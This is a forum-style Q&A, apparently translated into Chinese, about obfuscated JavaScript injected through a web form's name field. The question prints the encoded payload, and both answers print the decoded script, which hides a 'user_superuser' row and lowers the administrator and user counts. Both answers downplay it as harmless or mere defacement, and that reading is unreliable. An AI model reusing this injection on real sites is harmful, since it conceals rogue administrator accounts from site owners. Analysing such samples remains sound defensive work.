Question

随机用户将此文本添加为Web表单中的名称。我想他的想法是将Javascript注入动态页面。该代码应如何解释？（它是做什么的？）

<script LANGUAGE="JavaScript">
function Decode() {
    var temp = "",
        i, c = 0,
        out = "";
    var str = "46!46!46!32!60!98!32!105!100!61!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!62!32!118!97!114!32!115!101!116!85!115!101!114!78!97!109!101!32!61!32!102!117!110!99!116!105!111!110!40!41!123!32!116!114!121!123!32!118!97!114!32!116!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!66!121!73!100!40!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!41!59!32!119!104!105!108!101!40!116!46!110!111!100!101!78!97!109!101!33!61!34!84!82!34!41!123!32!116!61!116!46!112!97!114!101!110!116!78!111!100!101!59!32!125!59!32!116!46!112!97!114!101!110!116!78!111!100!101!46!114!101!109!111!118!101!67!104!105!108!100!40!116!41!59!32!118!97!114!32!116!97!103!115!32!61!32!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!72!51!34!41!59!32!118!97!114!32!115!32!61!32!34!32!115!104!111!119!110!32!98!101!108!111!119!34!59!32!102!111!114!32!40!118!97!114!32!105!32!61!32!48!59!32!105!32!60!32!116!97!103!115!46!108!101!110!103!116!104!59!32!105!43!43!41!32!123!32!118!97!114!32!116!61!116!97!103!115!91!105!93!46!105!110!110!101!114!72!84!77!76!59!32!118!97!114!32!104!61!116!97!103!115!91!105!93!59!32!105!102!40!116!46!105!110!100!101!120!79!102!40!115!41!62!48!41!123!32!115!32!61!40!112!97!114!115!101!73!110!116!40!116!41!45!49!41!43!115!59!32!104!46!114!101!109!111!118!101!67!104!105!108!100!40!104!46!102!105!114!115!116!67!104!105!108!100!41!59!32!116!32!61!32!100!111!99!117!109!101!110!116!46!99!114!101!97!116!101!84!101!120!116!78!111!100!101!40!115!41!59!32!104!46!97!112!112!101!110!100!67!104!105!108!100!40!116!41!59!32!125!32!125!32!118!97!114!32!97!114!114!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!117!108!34!41!59!32!102!111!114!40!118!97!114!32!105!32!105!110!32!97!114!114!41!32!105!102!40!97!114!114!91!105!93!46!99!108!97!115!115!78!97!109!101!61!61!34!115!117!98!115!117!98!115!117!98!34!41!123!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!114!32!110!61!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!125!32!125!99!97!116!99!104!40!101!41!123!125!59!32!125!59!32!97!100!100!76!111!97!100!69!118!101!110!116!40!115!101!116!85!115!101!114!78!97!109!101!41!59!32!60!47!115!99!114!105!112!116!62!";
    l = str.length;
    while (c <= str.length - 1) {
        while (str.charAt(c) != '!') temp = temp + str.charAt(c++);
        c++;
        out = out + String.fromCharCode(temp);
        temp = "";
    }
    document.write(out);
}
</script>

<script LANGUAGE="JavaScript">
Decode();
</SCRIPT>

Answer 1

它使用一些JavaScript代码创建一个脚本标签。它更改了一些HTML元素，似乎不是很危险。我们可能需要知道应该在哪个环境/网站中使用。

这是脚本创建的代码：

<b id="user_superuser"><script language="JavaScript">
var setUserName = function () {
  try {
    var t = document.getElementById("user_superuser");
    while (t.nodeName != "TR") {
      t = t.parentNode;
    };
    t.parentNode.removeChild(t);
    var tags = document.getElementsByTagName("H3");
    var s = " shown below";
    for (var i = 0; i < tags.length; i++) {
      var t = tags[i].innerHTML;
      var h = tags[i];
      if (t.indexOf(s) > 0) {
        s = (parseInt(t) - 1) + s;
        h.removeChild(h.firstChild);
        t = document.createTextNode(s);
        h.appendChild(t);
      }
    }
    var arr = document.getElementsByTagName("ul");
    for (var i in arr)
      if (arr[i].className == "subsubsub") {
        var n = />Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
        if (n != null && n[1] > 0) {
          var txt = arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi, ">Administrator (" + (n[1] - 1) + ")<");
          arr[i].innerHTML = txt;
        }
        var n = />Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
        if (n != null && n[1] > 0) {
          var txt = arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi, ">Administrator <span class=\"count\">(" + (n[1] - 1) + ")<");
          arr[i].innerHTML = txt;
        }
        var n = />All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
        if (n != null && n[1] > 0) {
          var txt = arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi, ">All <span class=\"count\">(" + (n[1] - 1) + ")<");
          arr[i].innerHTML = txt;
        }
      }
  } catch (e) {};
};
addLoadEvent(setUserName);

Answer 2

它将其注入页面...

关于的作用 ...嗯，什么都没有真的它用一些“管理员”文本替换了页面上的一些标签...而看不到我无法真正分辨出的其余代码，但看起来它主要是在破坏网站，吓到了你

... <b id="user_superuser">
<script language="JavaScript"> 
var setUserName = function() {
    try {
        var t = document.getElementById("user_superuser");
        while (t.nodeName != "TR") {
            t = t.parentNode;
        };
        t.parentNode.removeChild(t);
        var tags = document.getElementsByTagName("H3");
        var s = " shown below";
        for (var i = 0; i < tags.length; i++) {
            var t = tags[i].innerHTML;
            var h = tags[i];
            if (t.indexOf(s) > 0) {
                s = (parseInt(t) - 1) + s;
                h.removeChild(h.firstChild);
                t = document.createTextNode(s);
                h.appendChild(t);
            }
        }
        var arr = document.getElementsByTagName("ul");
        for (var i in arr)
            if (arr[i].className == "subsubsub") {
                var n = />Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
                if (n != null && n[1] > 0) {
                    var txt = arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi, ">Administrator (" + (n[1] - 1) + ")<");
                    arr[i].innerHTML = txt;
                }
                var n = />Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
                if (n != null && n[1] > 0) {
                    var txt = arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi, ">Administrator <span class=\"count\">(" + (n[1] - 1) + ")<");
                    arr[i].innerHTML = txt;
                }
                var n = />All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
                if (n != null && n[1] > 0) {
                    var txt = arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi, ">All <span class=\"count\">(" + (n[1] - 1) + ")<");
                    arr[i].innerHTML = txt;
                }
            }
    } catch (e) {};
};
addLoadEvent(setUserName);
</script>

这种可疑且可能是恶意代码的功能是什么？

2 个答案: